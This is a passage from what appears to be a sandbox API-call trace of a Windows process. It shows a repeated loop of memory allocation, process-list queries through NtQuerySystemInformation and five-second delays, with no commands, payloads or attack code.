ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.207] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.208] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.225] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.255] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.271] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.286] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.301] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.316] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.345] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.364] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.380] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.395] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.426] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.441] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.457] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.472] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.488] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.505] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.520] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.536] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 